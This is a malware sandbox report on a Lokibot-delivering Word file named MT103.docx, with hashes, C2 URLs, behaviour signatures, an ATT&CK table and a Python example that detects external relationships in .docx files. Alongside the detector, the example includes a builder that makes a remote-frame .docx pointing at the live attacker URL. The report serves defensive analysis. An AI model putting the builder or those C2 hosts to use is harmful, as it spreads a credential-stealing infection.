General

  • Target

    MT103.docx

  • Size

    10KB

  • Sample

    210622-2ykmz3fyw6

  • MD5

    fe5b477eb79cfd989a795ed9320f2e08

  • SHA1

    8224cc1161660bf79c3648ee9dd5e10f475ee444

  • SHA256

    1fb1fc6a0c468a93003ab6d6d1fb9b590a47b4f2712d430024ad63dd475c8418

  • SHA512

    f95392b5104806b32a5104021f47eabd5b61120ac43ea267681150bb311a15ce0c9028cfb57cbc7e8eb444d1ecbae391b888c9bc92dfe34ba2918a4182a537cf

Malware Config

Extracted

Rule
Microsoft Office WebSettings Relationship
C2

https://windowsdefendercloudsettingsdummy_username@itsssl.com/liqwN

Extracted

Family

lokibot

C2

https://bnbrokenhead.cf/Bn4/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Targets

    • Target

      MT103.docx

    • Lokibot

      Lokibot is a credential stealer that harvests saved passwords and cryptocurrency wallet data.

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Abuses OpenXML format to download file from external location

    • Loads dropped DLL

    • Uses the VBS compiler for execution

    • Suspicious use of SetThreadContext
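The "Abuses OpenXML format to download file from external location" signature and the "Microsoft Office WebSettings Relationship" extraction above describe the same artefact: a `.rels` part inside the `.docx` zip that carries a relationship with `TargetMode="External"`, which Word resolves over the network when the document is opened. The Python below is an added example, not Triage's extractor and not code from the sample; it builds a constructed minimal `.docx` (the real internals of MT103.docx are not shown on this page) whose webSettings frameset points at the C2 URL listed above, lists every external relationship target in the package, and resolves the host the client really contacts. Everything before the `@` in that URL is userinfo, so the request goes to `itsssl.com`, not to anything Windows Defender related; the `windowsdefendercloudsettings` prefix is decoration for the analyst reading the log.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Added example (not Triage's extractor, not code from the sample): enumerate the
# external relationship targets a .docx will resolve over the network on open.

PKG_RELS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFC_RELS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def external_targets(docx_bytes):
    """Return (rels_part, relationship_kind, target) for every relationship in the
    package whose TargetMode is External, i.e. whose target lies outside the zip."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in sorted(z.namelist()):
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{PKG_RELS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                # Last path element of the Type URI: frame, attachedTemplate, oleObject, ...
                kind = rel.get("Type", "").rsplit("/", 1)[-1]
                hits.append((name, kind, rel.get("Target", "")))
    return hits


def contacted_host(url):
    """Host the client actually connects to. Anything before '@' in the authority
    is userinfo and plays no part in name resolution, however official it looks."""
    return urlsplit(url).hostname


def build_sample_docx(frame_url):
    """Constructed minimal .docx (test input only, assumed layout) whose webSettings
    frameset references an external frame source through webSettings.xml.rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/></Types>')
        z.writestr("_rels/.rels",
            f'<Relationships xmlns="{PKG_RELS}"><Relationship Id="rId1" '
            f'Type="{OFC_RELS}/officeDocument" Target="word/document.xml"/></Relationships>')
        z.writestr("word/document.xml",
            f'<w:document xmlns:w="{W_NS}"><w:body><w:p/></w:body></w:document>')
        # Internal relationship: target stays inside the zip and must not be reported.
        z.writestr("word/_rels/document.xml.rels",
            f'<Relationships xmlns="{PKG_RELS}"><Relationship Id="rId1" '
            f'Type="{OFC_RELS}/webSettings" Target="webSettings.xml"/></Relationships>')
        z.writestr("word/webSettings.xml",
            f'<w:webSettings xmlns:w="{W_NS}" xmlns:r="{OFC_RELS}"><w:frameset><w:frameset>'
            f'<w:frame><w:name w:val="1"/><w:sourceFileName r:id="rId1"/></w:frame>'
            f'</w:frameset></w:frameset></w:webSettings>')
        # External relationship: this is the part the WebSettings rule extracts the C2 from.
        z.writestr("word/_rels/webSettings.xml.rels",
            f'<Relationships xmlns="{PKG_RELS}"><Relationship Id="rId1" '
            f'Type="{OFC_RELS}/frame" Target="{frame_url}" TargetMode="External"/></Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    url = "https://windowsdefendercloudsettingsdummy_username@itsssl.com/liqwN"
    for part, kind, target in external_targets(build_sample_docx(url)):
        print(f"{part}: {kind} -> {target}  (connects to {contacted_host(target)})")
```

Run against a real document, `external_targets(open(path, "rb").read())` is the triage check: any `External` relationship in `settings.xml.rels` (attachedTemplate) or `webSettings.xml.rels` (frame) is a remote fetch on open and belongs in the IOC list, whatever the file extension says. Pair the target with `contacted_host()` before blocking, so the block list carries the real domain rather than the decoy userinfo.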

MITRE ATT&CK Matrix (ATT&CK v6)

  Tactic           Technique                          ID     Count
  Execution        Scripting                          T1064  1
  Execution        Exploitation for Client Execution  T1203  1
  Defense Evasion  Scripting                          T1064  1
  Defense Evasion  Modify Registry                    T1112  1
  Discovery        System Information Discovery       T1082  3
  Discovery        Query Registry                     T1012  2

Tasks